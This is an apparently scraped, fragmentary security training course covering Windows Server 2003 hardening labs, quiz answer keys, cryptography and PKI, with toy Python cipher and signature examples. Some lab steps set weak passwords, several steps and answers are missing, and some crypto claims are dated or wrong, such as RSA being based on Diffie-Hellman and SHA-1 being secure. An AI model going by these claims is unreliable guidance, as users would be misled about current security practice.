Database corruption, accidental damage, and unauthorized or malicious activity can lead to huge losses without appropriate backup strategies. Backup and recovery procedures should be in place to minimize downtime and financial loss. Keeping information in the database up-to-date is critically important. Without backups and up-to-date information, organizations can suffer dramatic asset losses.
C-4: Directory services
2 The three authentication types used by LDAPv3 are _______, _________, and _______.
anonymous, simple, SASL
3 The initial accounts created when a database is installed are the most secure accounts to use for user access to the database. True or false?
False. The default accounts and passwords are well known, and provide varying levels of access to the data. These accounts should be disabled.
4 Database system files must be set up with restricted _____________ access so that an attacker cannot remove or modify these files.
Read/Write
Security baselines
Securing computers
Explanation
Covering all that needs to be done to completely secure a computer, whether a workstation or a server, is beyond the scope of this section. However, because basic workstation and server security is very similar, this discussion covers the general steps you should take. The following steps should ensure that your system is relatively secure:
- Remove any unnecessary protocols, such as NetBIOS or IPX, and services.
- Remove all unnecessary user accounts.
- Remove all unnecessary shares.
- Rename the administrator account.
- Use strong passwords.

As mentioned previously, completely securing a personal computer requires that the computer be either disconnected from all network and telecom systems or placed behind a properly designed and implemented firewall. For defense in depth, install a personal firewall and antivirus package on your system.
Hardening the Windows Server 2003 server
If you plan to use a software-based firewall such as Microsoft's ISA Server or Checkpoint Firewall-1, it is very important that you harden the server prior to installing the firewall software. Once the hardening process is complete, the server is known as a bastion host. The first step to hardening a server is to apply the latest service pack and all patches and hotfixes. In the following activity, you will install Windows Server 2003 and apply the latest service pack and patches.

Do it!
D-1: Installing Windows Server 2003 service packs and hotfixes

If time is limited, skip activities D-1 through D-4.

Here's how (with the "Here's why" notes in parentheses):
1 Log on to your server as Administrator (if necessary)
2 Insert the Windows Server 2003 CD-ROM. Close the autorun window (if it appears)
3 Click Start and choose Run
4 Click Browse
5 Navigate to your CD-ROM drive
6 Double-click English
7 Double-click WIN2003
8 Double-click STANDARD
9 Double-click i386
10 Double-click WINNT32.exe
11 Click OK
12 From the Installation Type dropdown list, select New Installation (Advanced). Click Next
13 Accept the license agreement and click Next
14 Enter the product key and click Next
15 On the Setup Options window, click Advanced Options
16 Change the Windows installation folder to \Bastion. Click OK
17 Click Next
18 If you are prompted to upgrade to NTFS, select Use the NTFS file system (recommended). Otherwise, continue with step 19
19 Click Next
20 Press e (to begin the text-based portion of the server setup)
21 Press g (when prompted to repair)
22 Select the C: drive for the partition (if your C: drive is low on space, you can choose another partition). Press e (to choose the partition)
23 Press C (to continue; the setup program will copy and install files, and then the computer will restart. The GUI portion will then run)
24 In the Regional and Language Options screen, click Next
25 Enter your name and organization. Click Next
26 Select Per Device or Per User (to specify the licensing mode). Click Next
34 Log on as Administrator
35 At the Manage Your Server screen, check Don't display this page at logon and then close the screen
36 Open Internet Explorer
37 Select In the future, do not show this message in the future (if prompted). Click OK
39 Activate the Security tab. Select Internet and move the slider to Medium. Click Yes. Click OK (students may be prompted for information about their Internet connection)
Go to http://www.microsoft.com/security (using Internet Explorer; if prompted, provide information regarding the computer's connection to the Internet)
40 Download the latest Service Pack and hotfixes
41 Install the Service Pack
42 Install any additional hotfixes
43 Shut down the server
Do it!
D-2:

If time is limited, skip this activity.

Here's how:
1 Boot to the bastion host
2 Log on as Administrator
3 Change the Administrator password to Pa$$word
4 Click Start, choose Run, and enter syskey (notice that the Encryption Disabled option is not available; Windows Server 2003 encrypts the accounts database by default)
5 Click Update
6 Select Password Startup
7 Enter password as the password. Click OK. Click OK (you'll be notified that the Account Database Startup Key was changed)
D-3:

If time is limited, skip this activity.

Here's how:
1 Restart the server
2 Boot to the bastion host
3 For the Startup password, enter password
4 Log on to the bastion server as Administrator
5 Click Start
6 Choose Administrative Tools, Local Security Policy
7 Expand Account Policies. Select Password Policy
8 Double-click Password must meet complexity requirements
9 Select Enabled. Click OK
10 Try to change the Administrator password to password (it will fail)
11 Click Start, then choose Run. Enter mmc (to open a new management console window)
12 Choose File, Add/Remove Snap-in
20 Click OK
21 Close the mmc window. Click Yes. Enter Bastion as the File name
22 Click Save
23 Restart the computer
24 Enter password for the Startup password
25 Log on as root (the password is Pa$$word; the bastion.inf security policy template changed the Administrator account to root. You'll receive a message that this is a private system and that unauthorized use is prohibited)

To open a Command window. No IP address is assigned because the security settings have disabled the DHCP client. As such, the machine is now isolated from the network.
Do it!
D-4:

If time is limited, skip this activity. Make sure students boot to the original server partition, not the bastion host.

Here's how:
1 Restart the computer and boot to the original server partition, not the bastion host
2 Log on as Administrator (the password is password)
3 Click Start and then right-click My Computer
9 Click Yes (make sure students don't boot to the bastion host)
10 Boot to the regular server partition and log on as Administrator
11 Click Start, then choose Control Panel, Network Connections and right-click Local Area Connection
13 Click Advanced. Select the WINS tab. Select Disable NetBIOS over TCP/IP
14 Click OK three times
15 Repeat this process for all network cards
16 Open a command window (disable DNS before students ping another server by the computer name)
17 Ping another server in the room using only the computer name (it will fail because NetBIOS is disabled on the server)
18 Ping another server in the room using the server's IP address (the ping is successful)
19 Close all open windows
D-5: Exercises

1 Which of the following is a broadcast-based protocol?

2 Windows Server 2003 offers another level of TCP/IP protection by supporting which of the following?

3 What are the steps you should take to ensure that your system is relatively secure?
A Remove any unnecessary protocols such as NetBIOS or IPX.
B Remove all unnecessary user accounts.
C Remove all unnecessary shares.
D Rename the administrator account.
E Use strong passwords.
F All of the above.

4 To configure TCP/IP filtering you will need to know which of the following? (Choose all that apply.)
Topic B
Topic C
Topic D
Review questions
1 Describe OS/NOS hardening.
The process of modifying an operating system's default configuration to make it more secure from outside threats.
4 Windows Server 2003 only allows pre-defined security templates to be applied, since administrator-created security templates would leave the network vulnerable to attack. True or false?
False. The administrator can apply pre-made or custom made templates.
6 An administrator might choose to disable an application for which they have not yet obtained a security patch to address a security related problem that has been identified. True or false?
True
7 If an update is critical, you should skip the step of testing it in order to get the update installed as soon as possible. True or false?
False. While you could do this, you are putting the users' systems at risk by doing so.
8 What is the trade-off for making systems easily accessible for customers and trade partners?
The easy accessibility makes them vulnerable to hackers and cyber terrorists.
10 Which is less receptive to attacks? A firewall with a static routing configuration or one with a dynamic routing configuration?
A static routing configuration is less receptive to attacks.
11 Which of the following are practices to follow when configuring routers and firewalls? (Choose all that apply.)
A Allow IP-directed broadcasts through the system.
B Configure devices with meaningful host names.
C Configure a loopback address.
D Restrict data traffic to required ports and protocols.
12 A(n) _________________ is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet.
Access Control List
14 Identify the term that each definition describes: Enhancements to an application.
Updates
17 FTP should only be deployed if there is a legitimate business need due to its insecure nature. True or false?
True
19 List at least three steps you should take to ensure that your system is secure.
Remove unnecessary protocols, remove unnecessary user accounts, remove unnecessary shares, rename the administrator account, and use strong passwords.
3 Create your two groups. From the Computer Management window, right-click the Groups folder in the left pane, and choose New Group. Name the group in the window that opens (according to the preceding table); then click the Add button. Specify or select users to add to this group (according to the preceding table). Follow this procedure to create and populate your second group.

Assigning file permissions
In this project, you'll work with some folders. (The same procedure can be used for files.)
1 From Windows Explorer, create three folders under C:\: Administrative and System Information, Case Data Files, and Sensitive Data (again, this is primarily to keep things simple; normally there would be a lot more categories and folders than this). Here, you'll apply permissions to these folders.
2 Right-click any of the three folders you just created. Choose Properties from the shortcut menu, and activate the Security tab.
3 Click the Add button, and then specify or browse to and select (using the Advanced button) the groups you created to add them to the Name list.
4 Select each group from the Name list, one at a time, to apply appropriate permissions in the Permissions list, based on the matrix you created in the first project.
5 Do the same for the other two folders you created.
6 You can delete the folders that you created in this project, but save the user accounts and groups.
Unit 14 Cryptography
Unit time: 180 minutes
Complete this unit, and you'll know how to:
A Define the concepts of cryptography,
system.
C Explain key management and the
Functions of cryptography
Explanation
Cryptography is the process of converting readable text (plaintext) into an unreadable series of characters and symbols (ciphertext). Cryptography allows users to transmit sensitive information over unsecured networks. Cryptography can be either strong or weak. The strength of a cryptographic method is measured by the time and resources it takes to recover the plaintext. Cryptography has four primary functions:
- Confidentiality
- Authentication
- Integrity
- Non-repudiation
All are vital components in computer interaction.

Confidentiality
Confidentiality is often the most widely recognized component of cryptography. The primary purpose of early ciphers was to make sure that information was kept secret. When you're sending important data on a network, it's of vital importance that the data remain confidential; otherwise, a company or organization could be giving away trade secrets or other information that could be damaging to the entity.

Authentication
When data is being transferred, the receiver of a message should be able to verify the origin of that message. Without such authentication services, a data user would never know if the information received was from a legitimate sender or from a malicious attacker masquerading as a legitimate sender.

Integrity
The data in transit should also pass verification that it has not been tampered with or altered and that it maintains its integrity. Imagine what could happen if a sender sent his data via the network and a malicious third party intercepted the data. The third party could alter the data or add malicious code, such as a virus, and then send the information along to its intended recipient. Without encryption, the recipient would not be able to identify whether the integrity of the data was acceptable, and the recipient could very well use the corrupted data without even knowing it.

Non-repudiation
Another benefit of cryptography is non-repudiation, which means that the data sender cannot deny having sent a certain piece of information.
Algorithms
Modern cryptography uses algorithms to encrypt and decrypt data. An algorithm is a set of instructions that works in tandem with a key. The same plaintext data encrypts into different ciphertext with different keys. The security of the data relies on two things: the strength of the algorithm and the secrecy of the key. Different algorithms offer different degrees of security. Determining whether or not an algorithm is sufficient depends on whether or not the cost of breaking the algorithm is greater than the value of the data, in terms of both time and resources needed. Modern cryptography employs two types of algorithms for encrypting and decrypting data: symmetric and asymmetric. The following table provides a quick comparison of the two types of algorithms. It's vital to understand how the two types differ and when you would use one type instead of the other.

Type: Symmetric
Advantages: Single key.
Disadvantages: Requires sender and receiver to agree on a key before transmission of data. Security of the algorithm lies solely with the key. High cost because dissemination of key information must be done over secure channels.

Type: Asymmetric
Advantages: Encryption and decryption keys are different. The decryption key cannot be calculated from the encryption key.
Disadvantages: Security of keys can be compromised when malicious users post phony keys. Slow method of encryption.
Symmetric algorithms
Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key and vice versa. In most symmetric algorithms, the encryption and decryption keys are the same. These types of algorithms are also known as secret-key algorithms, single-key algorithms, or one-key algorithms, and they require the sender and receiver to agree on a key before they communicate securely. Therefore, the security of a symmetric algorithm lies with the key. If the key becomes known, anyone can access the encrypted information, as shown in Exhibit 14-1. Symmetric algorithms can be divided into two categories: stream algorithms and block algorithms. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits. Typical block sizes used in everyday computing today are 64 and 128 bits. This type of cryptography was once the only available way to transmit secret information. The obvious problem, of course, was the exchange of keys: until the key is exchanged, encryption is impossible, but the value of the key makes its security critical. The solution is transmitting the private key over secure channels.
Asymmetric algorithms
In asymmetric algorithms, also known as public-key algorithms, the encryption key and the decryption key are different. Security of asymmetric algorithms is further enhanced by the fact that the decryption key cannot be calculated from the encryption key. Asymmetric algorithms allow a given host's encryption key to be made public. Anyone can use the key to encrypt data and send it to the host. However, only the host can decrypt the data by using the corresponding decryption key, as shown in Exhibit 14-2.

Exhibit 14-2: Encryption using an asymmetric algorithm

Asymmetric algorithms allow users with no security policies to communicate securely. There is no need to share private keys over a secure channel, as there is with symmetric algorithms. Some examples of asymmetric encryption are El Gamal, RSA (named for its inventors' last names), and the Digital Signature Algorithm.
Common encryption algorithms
Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. Feistel devised a set of parameters to use when creating algorithms for encryption purposes. The principles include:
- When you're creating ciphers, the larger the block size and key size, the more secure the cipher will be.
- Using multiple rounds offers increasing security.
- These concepts have to be balanced with the speed of the execution of the algorithm.
- With increased computing power, more complex algorithms can be used.

The following common algorithms were all developed using this framework. This list is not an exhaustive list of algorithms in use, but it represents a sampling of the most widely known ciphers.

Lucifer (1974): IBM developed Lucifer in response to requests for a strong encryption algorithm to be used to protect non-classified data. As the first-ever block cipher developed, it uses a 128-bit key and 16 rounds in the encryption process. Lucifer suffers from a weak key structure and is vulnerable to attacks, yet it still can be effective when used in tandem with other algorithms.

Diffie-Hellman (1976): The Diffie-Hellman cipher, named after its developers, uses a public-key system (actually, the oldest public-key system still in use). It offers better performance than other encryption algorithms because it's focused on the trading of a shared key between two users. It's commonly used in IPSec.

RSA (1977): Named for its developers, Rivest, Shamir, and Adleman, the RSA algorithm is based on the Diffie-Hellman cipher. RSA uses a public-key system with a variable key length and block size. RSA is a very flexible algorithm, but with greater key lengths and block sizes, it can be slow to compute in some environments.

DES (1977): The Data Encryption Standard (DES) algorithm is a modified version of the Lucifer algorithm. DES was once the most widely used block cipher, and it used a 56-bit key length. In 1998, the Electronic Frontier Foundation cracked the DES algorithm, by using a specifically designed computer, in less than three days. This led to the development of Triple DES.

Triple DES (1998): Triple DES uses the same algorithm as DES, but uses three keys and three executions of the algorithm to encrypt and decrypt data, resulting in a 168-bit key. Because of this, it's three times slower than DES but much more secure. That said, with current computing capabilities, Triple DES is not foolproof. Triple DES is very easy to implement in encryption systems that currently use DES as their encryption algorithm.

IDEA (1992): IDEA is a block cipher operating on 64-bit blocks and using a 128-bit key. The algorithm was developed by Xuejia Lai and James Massey, and it's patented for corporate use by the Swiss firm Ascom. IDEA is commonly used in PGP and is a substitute for DES and Triple DES. There are no known attacks at this time for this algorithm.

Blowfish (1993): Blowfish was developed as a free, unpatented cipher by Bruce Schneier. It's a 64-bit block cipher that uses variable-length keys. Blowfish is characterized by its ease of implementation, high execution speeds, and low memory usage. At this time, there are no known attacks for this algorithm.
RC5 (1995): RC5 was developed by Ronald Rivest for RSA Data Corporation. The RC5 algorithm was created to be suitable for either hardware or software functions. Like Blowfish, it's very fast, it's easy to implement, and it has low memory usage. RC5 uses a variable key length and a variable number of rounds; this makes it flexible and adaptable. At this time, there are no known attacks for this algorithm.

The study of algorithms for use in encryption services continues to create new and improved ciphers. It's important to keep up-to-date on the latest developments, in terms of both new algorithms and new attacks for existing algorithms.
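To make the Feistel structure behind DES, Blowfish and the other ciphers above concrete, here is a toy Feistel network added as an example (not code from the course). It uses a 16-bit block, a constructed SHA-256-based round function and key schedule, and no real security; it shows that decryption is the same network run with the round keys reversed, and that more rounds spread a single-bit plaintext change across the ciphertext.

```python
"""Toy Feistel network (added illustration, not from the course).
Block size is 16 bits, split into two 8-bit halves. The round function and
key schedule are constructed for the demo and provide no real security."""
import hashlib

HALF_BITS = 8
HALF_MASK = (1 << HALF_BITS) - 1


def round_function(half: int, subkey: int) -> int:
    """F(R, K). A Feistel round function need not be invertible, because the
    network only ever XORs its output in; here it is one byte of a SHA-256 hash."""
    return hashlib.sha256(bytes([half, subkey])).digest()[0]


def key_schedule(key: bytes, rounds: int) -> list:
    """Derive one 8-bit subkey per round from the cipher key (constructed schedule)."""
    return [hashlib.sha256(key + bytes([i])).digest()[0] for i in range(rounds)]


def feistel(block: int, subkeys: list) -> int:
    """Run the network. Each round computes L' = R and R' = L XOR F(R, K).
    The final swap is undone, so the same function with the subkeys in
    reverse order inverts it; that is the Feistel property."""
    left = (block >> HALF_BITS) & HALF_MASK
    right = block & HALF_MASK
    for k in subkeys:
        left, right = right, left ^ round_function(right, k)
    return (right << HALF_BITS) | left


def encrypt_block(block: int, key: bytes, rounds: int = 8) -> int:
    return feistel(block, key_schedule(key, rounds))


def decrypt_block(block: int, key: bytes, rounds: int = 8) -> int:
    # Decryption is encryption with the round keys reversed; no inverse of F is needed.
    return feistel(block, key_schedule(key, rounds)[::-1])


def bit_changes(a: int, b: int) -> int:
    """Number of bit positions in which two blocks differ."""
    return bin(a ^ b).count("1")


def avalanche(rounds: int, key: bytes = b"constructed demo key") -> int:
    """Ciphertext bits that change when one plaintext bit is flipped.
    With a single round exactly one bit changes (the other half passes
    through untouched); more rounds spread the change across the block,
    which is why the course lists multiple rounds among Feistel's principles."""
    plaintext = 0x1234
    flipped = plaintext ^ 0x8000    # flip the top bit of the left half
    return bit_changes(encrypt_block(plaintext, key, rounds),
                       encrypt_block(flipped, key, rounds))


if __name__ == "__main__":
    key = b"constructed demo key"
    ct = encrypt_block(0xBEEF, key)
    print(f"ciphertext {ct:04x}, decrypts to {decrypt_block(ct, key):04x}")
    for r in (1, 2, 8):
        print(f"{r} round(s): {avalanche(r)} of 16 ciphertext bits change")
```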
Do it! A-1:
3 Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. True or false?
True
4 Provide the correct cipher name for each of the descriptions below:
128-bit key with a weak key structure: Lucifer
56-bit key length that is easily cracked: DES
64-bit block cipher that uses variable-length keys: Blowfish
Block cipher operating on 64-bit blocks and using a 128-bit key: IDEA
Fast and easy to implement; no known attacks at this time: RC5
Three keys and three executions, resulting in a 168-bit key: Triple DES
Uses a public-key system, and variable key length and block size: RSA
Uses a public-key system; commonly used in IPSec: Diffie-Hellman
Hashing
Explanation
Hashing is critical to modern cryptography. Hash functions have been used in computer science for verification purposes for many years. Hashing involves taking a variable-length input and converting it to a fixed-length output string (called a hash value). This allows a user to identify whether or not the data received is the same as the data that was sent. If you want to verify that someone has a particular file that you also have, but you don't want it sent to you, you can ask for the hash value of that file. If the hash value sent corresponds to the hash value you have on the same file, you can be reasonably assured that it's the same file. Hashing is used in modern cryptography to verify that data being sent over an unsecured channel has not been changed in any way. If the data has been modified in any way, the hash value will be different, and the receiving party will know that the data has been corrupted or tampered with. The two most commonly used hash functions are SHA-1 (Secure Hash Algorithm 1), developed by the National Security Agency (NSA), and MD5 (Message Digest algorithm version 5), a product of RSA Security. SHA-1 is considered the more secure of the two algorithms.
Digital signatures
Most public-key algorithms have the useful feature that the public key can decrypt a message encrypted with the private key, as well as the reverse, which is the typical method to ensure privacy. If a public key can successfully decrypt a message, then the only person who could have done the encryption is the holder of the corresponding private key. This application of asymmetric encryption is known as a digital signature.

A digital signature is created using a hash function. You perform a hash on the message to create a message digest, a shorter version of the message; then you encrypt the message digest by using your own private key. The digital signature is then appended to a plaintext or encrypted message. The recipient cannot open the digital signature unless the public key of the original sender matches the private key used to encrypt the message digest.

The basic process by which a message is signed with a digital signature and then verified by the recipient is as follows:
1 Alice produces a message digest by passing her message through a hashing algorithm.
2 The message digest is then encrypted using Alice's private key.
3 Alice sends the message to Bob.
4 Bob creates a message digest from the message, using the same hashing algorithm that Alice used; he then decrypts Alice's signature digest by using Alice's public key.
5 Bob compares the two message digests: one created by Alice and the other by himself. If the two match, he knows he has received a message from Alice and the message has not been altered.

Exhibit 14-3 illustrates this process. The fact that Bob can use Alice's public key to recover the original message digest guarantees its integrity and provides non-repudiation.
Digital certificates
When using public-key cryptography, users should be aware that they're sending information encrypted with the recipient's public key. Malicious users, however, can post a phony key with the name and identification of a potential recipient. If data is encrypted with this phony key, the data is readable only by the malicious user. The first instinct is to send encrypted data only to those keys that you know of firsthand. But what happens if you need to exchange vital information with someone you've never met? The best way to address this issue is to use digital certificates.

Digital certificates simplify the task of verifying whether a public key belongs to its owner. A digital certificate acts in much the same way as a passport or driver's license: a trusted authority verifies your identity and then stamps or signs the certificate. If you receive a certificate along with encrypted information, you are assured of the sender's authenticity. Digital certificates, as specified in the X.509 certificate standard, contain the following information:
- Identifying information, such as the user's name and identity, a unique serial number, and the validity dates for the life of the certificate.
- The public key of the certificate holder.
- The digital signature of the Certification Authority. This component validates the whole package. The CA attaches its signature to the certificate, vouching that the information within the certificate is true. The CA signature, in essence, binds the certificate holder's identifying information to the public key, leaving no doubt as to who the true owner of the key is.

Some applications for digital certificates include:
- Secure Web communications: Use certificates with SSL/TLS protocols for authenticating and encrypting data passed between servers and clients.
- Secure Web sites: Use certificates to authenticate access to secure Web sites.
- Secure e-mail: Enable Secure Multipurpose Internet Mail Extensions (S/MIME) services to add authentication and privacy to e-mail messages.
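The hashing, digital signature and digital certificate sections above fit together in one short walk-through, added here as an example (not code from the course). It uses textbook RSA with constructed, far-too-small primes and SHA-256 from hashlib: Alice signs a message digest with her private key, a CA signs a certificate binding Alice's name and public key, and Bob detects a tampered message, a forged signature, an expired certificate and a phony certificate posted under Alice's name. The names, dates and message are all constructed.

```python
"""Toy RSA digital signatures and CA-issued certificates (added example,
not code from the course). The RSA keys use tiny constructed primes and are
insecure; they exist only to show the steps. SHA-256 comes from hashlib."""
import hashlib
import json


def make_keypair(p: int, q: int, e: int = 17):
    """Textbook RSA from two primes. Returns (public_key, private_key)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)             # private exponent (Python 3.8+)
    return (e, n), (d, n)


def digest(message: bytes) -> bytes:
    """Step 1: hash the variable-length message into a fixed-length digest."""
    return hashlib.sha256(message).digest()


def sign(message: bytes, private_key) -> list:
    """Step 2: encrypt the digest with the signer's private key.
    Each digest byte is signed separately so every value stays below the tiny n."""
    d, n = private_key
    return [pow(b, d, n) for b in digest(message)]


def verify(message: bytes, signature: list, public_key) -> bool:
    """Steps 4 and 5: recompute the digest, decrypt the signature with the
    public key, and compare. A changed message or a signature made with a
    different private key makes the two digests disagree."""
    e, n = public_key
    recovered = [pow(s, e, n) for s in signature]
    return recovered == list(digest(message))


def issue_certificate(subject: str, subject_key, serial: int,
                      not_before: str, not_after: str, ca_private_key) -> dict:
    """The CA puts the X.509-style fields the course lists (identity, serial,
    validity dates, public key) into a body and signs it with its private key."""
    body = {"subject": subject, "serial": serial, "not_before": not_before,
            "not_after": not_after, "public_key": list(subject_key)}
    encoded = json.dumps(body, sort_keys=True).encode()
    return {"body": body, "ca_signature": sign(encoded, ca_private_key)}


def verify_certificate(cert: dict, ca_public_key, today: str) -> bool:
    """Check the CA signature over the body and the validity window.
    A phony certificate that the CA never signed fails here."""
    encoded = json.dumps(cert["body"], sort_keys=True).encode()
    body = cert["body"]
    in_window = body["not_before"] <= today <= body["not_after"]
    return in_window and verify(encoded, cert["ca_signature"], ca_public_key)


def demo() -> dict:
    """Run the Alice/Bob scenario and return each check's outcome."""
    ca_pub, ca_priv = make_keypair(101, 113)          # constructed primes
    alice_pub, alice_priv = make_keypair(61, 53)
    mallory_pub, mallory_priv = make_keypair(89, 97)
    today = "2024-06-01"                              # constructed date

    # The CA vouches for Alice's key. Mallory posts a phony certificate that
    # names Alice but carries Mallory's key, signed with Mallory's own key.
    alice_cert = issue_certificate("alice@example.test", alice_pub, 1001,
                                   "2024-01-01", "2024-12-31", ca_priv)
    phony_cert = issue_certificate("alice@example.test", mallory_pub, 9999,
                                   "2024-01-01", "2024-12-31", mallory_priv)

    # Bob only trusts a key whose certificate checks out against the CA.
    results = {
        "alice_cert_ok": verify_certificate(alice_cert, ca_pub, today),
        "phony_cert_ok": verify_certificate(phony_cert, ca_pub, today),
        "expired_cert_ok": verify_certificate(alice_cert, ca_pub, "2025-03-01"),
    }

    # Step 3: Alice sends the message plus her signature; Bob verifies with
    # the public key taken from the CA-signed certificate.
    message = b"Transfer 100 units to account 42"     # constructed message
    signature = sign(message, alice_priv)
    trusted_key = tuple(alice_cert["body"]["public_key"])
    results["signature_ok"] = verify(message, signature, trusted_key)
    results["tampered_ok"] = verify(b"Transfer 900 units to account 42",
                                    signature, trusted_key)
    results["forged_ok"] = verify(message, sign(message, mallory_priv),
                                  trusted_key)
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16} {ok}")
```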
A-2:
2 Which of the following are examples of a hash algorithm? (Choose all that apply.)
3 Hashing checks whether a message has been tampered with. True or false?
True
4 Digital signatures use a private key to encrypt a message digest. If the public key can decrypt the message, then authenticity, integrity, and non-repudiation are proven. True or false?
False. Just integrity and non-repudiation are guaranteed.
5 Digital certificates contain which of the following information? (Choose all that apply.)
A B
Users name and identity Validity dates for the life of the certificate Private key Public key CAs digital signature
C
D E
6 Digital certificates bind the users identity to the public key. True or false?
True
Cryptography
1411
Components
The PKI system establishes a framework for management of private keys and certificates, including defining who is responsible for authentication. PKI standards describe two key roles for validating the identity of the user and issuing the digital certificate: the Certificate Authority and the Registration Authority. In addition, each PKI system has at least one certificate server.
Certificate Authority (CA)
The Certificate Authority is a person or group who is responsible for issuing certificates to authorized users. The CA creates the certificate and then digitally signs it by using its own private key, thereby guaranteeing the authenticity of the certificate. In addition to certificate generation, the CA is responsible for storing and safeguarding the certificates.
Registration Authority (RA)
The Registration Authority (RA) is used to offload the work of the CAs. The RA acts as a middleman between the CA and the subscriber, accepting registrations for the CA, validating the subscriber's identity, and distributing keys. The RA does not issue certificates on its own.
Trust models
In small organizations, it's easy to trace a certification path back to the CA that granted the certificate. But internal communications are not the only ones requiring validation. Communication with external clients and customers is an everyday occurrence. It's difficult to trust communications from entities who don't appear in an organization's CA. Organizations typically follow a trust model, which explains how users can establish a certificate's validity. Three commonly used models are:
- Single-authority trust (also known as third-party trust)
- Hierarchical trust
- Web of Trust (also known as Mesh trust)
In the single-authority trust model, a third-party central certifying agency signs a given key and authenticates the owner of the key. The users trust the authority and, by association, trust all keys issued by that authority. Exhibit 14-4 illustrates this model.
In the Web of Trust model (shown in Exhibit 14-6), the key holders sign each other's certificates, thereby validating the certificates based on their own knowledge of the key holder. Anyone can sign someone else's public key, becoming an introducer in the process. If a user knows and trusts the introducer, he or she should be willing to trust the public key through association. This model is used in encryption applications, such as PGP, where no central authority exists. The main vulnerability with the Web of Trust is the careless or malicious user who signs bad keys. If just one person in the Web of Trust is negligent, the whole group can be affected.
Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate.
Signature using the private key of the entity that issued the certificate.
Public Key Cryptography Standards (PKCS)
PKCS is an industry standard developed by RSA Laboratories in cooperation with a consortium of system developers, including Apple, DEC, Lotus, Microsoft, MIT, and Sun. The standard was first published in 1991 to help deploy public-key cryptography. The standard defines encryption algorithms (PKCS #1), Diffie-Hellman and elliptic curve algorithms (PKCS #13), password-based encryption (PKCS #5), private-key standards (PKCS #8), and certification request syntax (PKCS #10).
Do it! B-1:
3 Explain the difference between a certificate policy and certificate practice statement.
The certificate policy is issued with each certificate and describes how that particular certificate will be used. The policy identifies the user community, the names of the CA and RA, and the certificate's OID. The certificate practice statement is a published document that explains how the CA runs its business. It includes the CA structure, the standards and protocols used, and the way certificates are managed.
4 For each of the descriptions below, identify whether the trust model is single authority, Web of Trust, or hierarchical.
A third-party CA signs a key, authenticating the owner of the key. Single authority
An introducer signs a colleague's certificate.
The trust path leads back to a root CA. This model allows for enforcement of policies and standards throughout the infrastructure.
5 Netscape and Microsoft both use X.509 certificates, and any browser can read their certificates. True or false?
False. Both vendors have adapted X.509 to meet their needs, which means that their certificates are not necessarily compatible with other browsers.
6 PKCS was developed by RSA and other system developers to standardize ______________.
A Encryption algorithms
B Private-key standards
C Certification request syntax
D All of the above
Once the key pair has been generated, the private key must be safely stored to protect it from being compromised, lost, or damaged. There are several key-storage methods, generally categorized as hardware or software storage. Hardware storage refers to storing the private key on a hardware storage medium, such as a smart card, memory stick, USB device, PCMCIA card, or other such device. These devices can be physically carried on the person, enforce encryption of the private key, and often provide the added benefit of on-board encryption and decryption processing. The main disadvantage to this method is that the storage medium is small and can be easily lost or stolen. Software storage refers to storing the private key in a computer file on the hard drive. The owner encrypts the private key by using a password or passphrase, and stores the encrypted key in a restricted file. The user can enable auditing to track access to this file. This method is not considered reliable, because if the file is restored to a different medium (such as a floppy disk or FAT drive), the encryption is removed.
Certificate retrieval and validation
As the name implies, certificate retrieval involves access to certificates for general signature verification and for encryption purposes. Retrieval is necessary as part of the normal encryption process for key management between the sender and the receiver. For verification, retrieval is used as a reference: the certificate containing the public key that matches the signing private key is retrieved and sent along with the signature, or is made available on demand. It's imperative to have an easy and simple mechanism to retrieve certificates; otherwise, the complexity makes the system unusable. Validation is performed to ensure that a certificate is issued by a trusted CA in accordance with appropriate policy restrictions and to ascertain the certificate's integrity and validity (whether it's expired or has been revoked) before its actual usage. In most cases, all of this is achieved transparently by the client software before cryptographic operations using the certificate are carried out.
Note: Attempts to use revoked certificates are a likely sign of attempted break-in.
Key archive
Key archiving is the storage of keys and certificates for an extended period of time. It's an essential element of business continuity and disaster recovery planning, and it's the only solution that addresses lost keys and recovery of encrypted data. When used with additional services such as time stamping and notarization, a key-archive service meets audit requirements and handles the resolution of disputes. Key archiving is typically undertaken by an organization's CA, a trusted third party, or, in some cases, the end entity (although this is generally not reliable due to the complexities involved). All private keys (current, expired, and revoked), with the exception of keys used for non-repudiation, are backed up to a key-archival server. The server requires strong physical security and at least the same security as the key-generating system.
Certificate renewal is the process of issuing a new certificate with a new validity period. All that's required is that the certificate owner use the old key to sign a request for a new certificate. To facilitate smooth transition and prevent service interruption, the renewal should be initiated when a certificate approaches three-quarters of its intended lifetime (or 30 days before expiration). Many Certificate Authorities merely repackage the old public key with the new certificate. This is a bad practice because the longer you keep the same key pair, the more insecure it will become over time. Ideally, a new key should be generated with each renewal (also called a certificate update).
Certificate revocation
Certificate revocation implies the cancellation of a certificate before its natural expiration. Certificate owners and PKI administrators (with the approval of the certificate owner) can revoke a key for any number of reasons; for instance, a company changes ISP or moves to a new address, a contact leaves the company, or a private key is compromised or damaged. The cancellation process is much easier than properly publishing and maintaining the revocation information after the fact. There are several ways in which the notification is accomplished. The primary method is through certificate revocation lists (CRLs). Essentially, CRLs are data structures containing revoked certificates. To maintain integrity and authenticity, CRLs are signed. Other methods include CRL distribution points, certificate revocation trees (CRTs), and Redirect/Referral CRLs. Performance, timeliness, and scalability are some of the main factors that influence the revocation mechanisms. Instant-access methods through the Online Certificate Status Protocol (OCSP) are also available. However, there is no guarantee that the real-time service is indeed providing an up-to-the-moment status. It's possible that the service might respond based on poorly updated databases. Additionally, many application implementations do not constantly check CRLs. There are also exceptions for which such notification is deemed unnecessary. Two such exceptions involve short certificate lifetimes and single-entity approvals. In the former case, the accepted revocation delay might be more than the certificate lifetime, so the certificate might not require revocation at all. In the latter case, as requests are always approved by a single entity, it might not be necessary to publish the revocation separately. The delay associated with the revocation requirement and subsequent notification is called revocation delay. Revocation delay must be clearly defined in the certificate policy because it determines how frequently or quickly the information is broadcast and used for verification.
Certificate suspension
